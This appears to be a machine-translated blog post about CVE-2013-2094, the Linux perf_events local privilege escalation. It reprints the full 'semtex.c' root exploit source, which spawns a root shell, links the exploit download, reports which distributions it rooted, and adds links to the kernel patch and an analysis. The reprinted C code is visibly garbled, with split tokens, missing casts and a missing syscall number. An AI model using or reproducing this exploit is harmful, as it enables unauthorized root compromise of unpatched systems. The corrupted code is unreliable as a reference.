Linux PREF_EVENTS Local Root 2.6.37-3.8.10 x86_64, Local Elevation of Privilege

Linux PREF_EVENTS Local Root 2.6.37-3.8.10 x86_64, Local privilege escalation, [CVE-2013-2094] Linux PREF_EVENTS Local Root 2.6.37-3.8.10 x86_64. http://sd.fucksheep.org/warez/semtex.c Another linux-safe idol, sd, has just been released .. It seems like a killer thing, but so far, my tests are rh6.3, centos6.3, 2.6.32. the kernel is successfully root, and only the system is suspended on 6.4, it can only prove that the vulnerability exists. To be corrected by a later person. We also need to warn you to fix your servers. Although it seems that this vulnerability has been fixed in linux 3.8.10... /** Linux 2.6.37-3. x. x x86_64 ,~ 100 LOC * gcc-4.6-O2 semtex. c &./a. out * 2010 sd@fucksheep.org, salut! ** Update may 2013: * seems like centos 2.6.32 backported the perf bug, lol. * jewgold to 115T6jzGrVMgQ2Nt1Wnua7Ch1EuL9WXT2g if you insist. */# define _ GNU_SOURCE 1 # include <stdint. h> # include <stdio. h> # include <stdlib. h> # include <string. h> # include <unistd. h> # include <sys/mman. h> # include <syscall. h> # include <stdint. h> # include <assert. h> # define BASE 0x380000000 # define SIZE 0x010000000 # define KSIZE 0x2000000 # define AB (x) (uint64_t) (0 xababababLL <32) ^ (uint64_t) (x) * 313337) void fuck () {int I, j, k; uint64_t uids [4] = {AB (2), AB (3), AB (4), AB (5 )}; uint8_t * current = * (uint8_t **) (uint64_t) uids) & (-8192); uint64_t kbase = (uint64_t) current)> 36; uint32_t * fixptr = (void *) AB (1); * fixptr =-1; for (I = 0; I <4000; I ++ = 4) {uint64_t * p = (void *) & current [I]; uint32_t * t = (void *) p [0]; if (p [0]! = P [1]) | (p [0]> 36 )! = Kbase) continue; for (j = 0; j <20; j ++) {for (k = 0; k <8; k ++) if (uint32_t *) uids) [k]! = T [j + k]) goto next; for (I = 0; I <8; I ++) t [j + I] = 0; for (I = 0; I <10; I ++) t [j + 9 + I] =-1; return; next :;}} void sheep (uint32_t off) {uint64_t buf [10] = {0x4800000001, off, 300, 298 x}; int fd = syscall (, buf, 0,-1,-1,-1, 0); assert (! Close (fd);} int main () {uint64_t u, g, needle, kbase, * p; uint8_t * code; uint32_t * map, j = 5; int I; struct {uint16_t limit; uint64_t addr;} _ attribute _ (packed) idt; assert (map = mmap (void *) BASE, SIZE, 3, 0x32, 0, 0) = (void *) BASE); memset (map, 0, SIZE); sheep (-1); sheep (-2 ); for (I = 0; I <SIZE/4; I ++) if (map [I]) {assert (map [I + 1]); break ;} assert (I <SIZE/4); asm ("sidt % 0": "= m" (idt); kbase = idt. a Ddr & 0xff000000; u = getuid (); g = getgid (); assert (code = (void *) mmap (void *) kbase, KSIZE, 7, 0x32, 0, 0) = (void *) kbase); memset (code, 0x90, KSIZE); code ++ = KSIZE-1024; memcpy (code, & fuck, 1024); memcpy (code-13, "\ x0f \ x01 \ xf8 \ xe8 \ 5 \ 0 \ 0 \ 0 \ x0f \ x01 \ xf8 \ x48 \ xcf ", printf ("2.6.37-3.x x86_64 \ nsd@fucksheep.org 2010 \ n") % 27); setresuid (u, u, u); setresgid (g, g, g ); while (j --) {needle = AB (j + 1); assert (p = memme M (code, 1024, & needle, 8); if (! P) continue; * p = j? (G <32) | u) :( idt. addr + 0x48);} sheep (-I + (idt. addr & 0 xffffffff)-0x80000000)/4) + 16); asm ("int $0x4"); assert (! Setuid (0); return execl ("/bin/bash", "-sh", NULL);} 5.15 update: latest message, the CVE number has come out. Thx @ Please call me great god CVE-2013-2094 and then the impact scope is also reduced, in fact, 3.8.9 has fixed this vulnerability. Second, this is indeed a zero-day vulnerability. Currently, major vendors have not provided formal binary hotfix patches. However, there is a patch on the linux kernel. If you are impatient, refer: http://git.kernel.org/cgit/linux/kernel/git/torvalds/linux.git/commit/?id=8176cced706b5e5d15887584150764894e94e02f If you are interested in the principle, you may want to check the Vulnerability Parsing by the Vulnerability der: http://www.reddit.com/r/netsec/comments/1eb9iw/sdfucksheeporgs_semtexc_local_linux_root_exploit/c9ykrck